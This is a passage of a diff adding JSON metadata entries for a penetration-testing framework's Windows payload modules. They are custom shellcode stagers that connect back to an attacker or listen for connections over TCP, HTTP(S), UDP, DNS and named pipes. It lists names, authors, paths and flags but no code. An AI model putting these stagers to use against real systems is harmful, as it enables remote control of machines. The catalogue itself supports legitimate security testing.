+    ],
+    "description": "Custom shellcode stage. \n        Tunnel communication over an HTTP or HTTPS hop point. Note that you must first upload\n        data/hop/hop.php to the PHP server you wish to use as a hop.",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_hop_http.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_hop_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_http": {
+    "name": "Windows shellcode stage, Windows Reverse HTTP Stager (wininet)",
+    "fullname": "payload/windows/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2021-11-10 12:33:52 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_http.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_http_proxy_pstore": {
+    "name": "Windows shellcode stage, Reverse HTTP Stager Proxy",
+    "fullname": "payload/windows/custom/reverse_http_proxy_pstore",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_http_proxy_pstore.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_http_proxy_pstore",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_https": {
+    "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (wininet)",
+    "fullname": "payload/windows/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2021-11-10 12:33:52 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_https.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_https_proxy": {
+    "name": "Windows shellcode stage, Reverse HTTPS Stager with Support for Custom Proxy",
+    "fullname": "payload/windows/custom/reverse_https_proxy",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "corelanc0d3r <peter.ve@corelan.be>",
+      "amaloteaux <alex_maloteaux@metasploit.com>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP using SSL with custom proxy support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_https_proxy.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_https_proxy",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_ipv6_tcp": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (IPv6)",
+    "fullname": "payload/windows/custom/reverse_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker over IPv6",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_named_pipe": {
+    "name": "Windows shellcode stage, Windows x86 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/windows/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_nonx_tcp": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/custom/reverse_nonx_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "vlad902 <vlad902@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker (No NX)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_nonx_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_nonx_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_ord_tcp": {
+    "name": "Windows shellcode stage, Reverse Ordinal TCP Stager (No NX or Win7)",
+    "fullname": "payload/windows/custom/reverse_ord_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "spoonm <spoonm@no$email.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_ord_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_ord_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp": {
+    "name": "Windows shellcode stage, Reverse TCP Stager",
+    "fullname": "payload/windows/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_allports": {
+    "name": "Windows shellcode stage, Reverse All-Port TCP Stager",
+    "fullname": "payload/windows/custom/reverse_tcp_allports",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Try to connect back to the attacker, on all possible ports (1-65535, slowly)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_allports.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_allports",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_dns": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (DNS)",
+    "fullname": "payload/windows/custom/reverse_tcp_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_dns.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_dns",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_rc4": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_rc4_dns": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)",
+    "fullname": "payload/windows/custom/reverse_tcp_rc4_dns",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_rc4_dns.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_rc4_dns",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_tcp_uuid": {
+    "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support",
+    "fullname": "payload/windows/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_udp": {
+    "name": "Windows shellcode stage, Reverse UDP Stager with UUID Support",
+    "fullname": "payload/windows/custom/reverse_udp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "RageLtMan <rageltman@sempervictus>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_udp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_udp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_winhttp": {
+    "name": "Windows shellcode stage, Windows Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/windows/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_winhttp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_winhttp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/custom/reverse_winhttps": {
+    "name": "Windows shellcode stage, Windows Reverse HTTPS Stager (winhttp)",
+    "fullname": "payload/windows/custom/reverse_winhttps",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "Borja Merino <bmerinofe@gmail.com>"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTPS (Windows winhttp)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x86",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/reverse_winhttps.rb",
+    "is_install_path": true,
+    "ref_name": "windows/custom/reverse_winhttps",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "payload_windows/dllinject/bind_hidden_ipknock_tcp": {
    "name": "Reflective DLL Injection, Hidden Bind Ipknock TCP Stager",
    "fullname": "payload/windows/dllinject/bind_hidden_ipknock_tcp",
@@ -197151,6 +200695,511 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "payload_windows/x64/custom/bind_ipv6_tcp": {
+    "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager",
+    "fullname": "payload/windows/x64/custom/bind_ipv6_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_ipv6_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_ipv6_tcp_uuid": {
+    "name": "Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager with UUID Support",
+    "fullname": "payload/windows/x64/custom/bind_ipv6_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for an IPv6 connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_ipv6_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_ipv6_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_named_pipe": {
+    "name": "Windows shellcode stage, Windows x64 Bind Named Pipe Stager",
+    "fullname": "payload/windows/x64/custom/bind_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "UserExistsError"
+    ],
+    "description": "Custom shellcode stage. Listen for a pipe connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_tcp": {
+    "name": "Windows shellcode stage, Windows x64 Bind TCP Stager",
+    "fullname": "payload/windows/x64/custom/bind_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_tcp_rc4": {
+    "name": "Windows shellcode stage, Bind TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/x64/custom/bind_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/bind_tcp_uuid": {
+    "name": "Windows shellcode stage, Bind TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/windows/x64/custom/bind_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Listen for a connection with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/bind_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/bind_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_http": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/windows/x64/custom/reverse_http",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_http.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_http",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_https": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (wininet)",
+    "fullname": "payload/windows/x64/custom/reverse_https",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "agix",
+      "rwincey"
+    ],
+    "description": "Custom shellcode stage. Tunnel communication over HTTP (Windows x64 wininet)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_https.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_https",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_named_pipe": {
+    "name": "Windows shellcode stage, Windows x64 Reverse Named Pipe (SMB) Stager",
+    "fullname": "payload/windows/x64/custom/reverse_named_pipe",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker via a named pipe pivot",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_named_pipe.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_named_pipe",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_tcp": {
+    "name": "Windows shellcode stage, Windows x64 Reverse TCP Stager",
+    "fullname": "payload/windows/x64/custom/reverse_tcp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_tcp",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_tcp_rc4": {
+    "name": "Windows shellcode stage, Reverse TCP Stager (RC4 Stage Encryption, Metasm)",
+    "fullname": "payload/windows/x64/custom/reverse_tcp_rc4",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "hdm <x@hdm.io>",
+      "skape <mmiller@hick.org>",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "mihi",
+      "max3raza",
+      "RageLtMan"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_rc4.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_tcp_rc4",
+    "check": false,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_tcp_uuid": {
+    "name": "Windows shellcode stage, Reverse TCP Stager with UUID Support (Windows x64)",
+    "fullname": "payload/windows/x64/custom/reverse_tcp_uuid",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "bwatters-r7",
+      "sf <stephen_fewer@harmonysecurity.com>",
+      "OJ Reeves"
+    ],
+    "description": "Custom shellcode stage. Connect back to the attacker with UUID Support (Windows x64)",
+    "references": [
+
+    ],
+    "platform": "Windows",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2020-09-22 02:56:51 +0000",
+    "path": "/modules/payloads/stagers/windows/x64/reverse_tcp_uuid.rb",
+    "is_install_path": true,
+    "ref_name": "windows/x64/custom/reverse_tcp_uuid",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
+  "payload_windows/x64/custom/reverse_winhttp": {
+    "name": "Windows shellcode stage, Windows x64 Reverse HTTP Stager (winhttp)",
+    "fullname": "payload/windows/x64/custom/reverse_winhttp",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
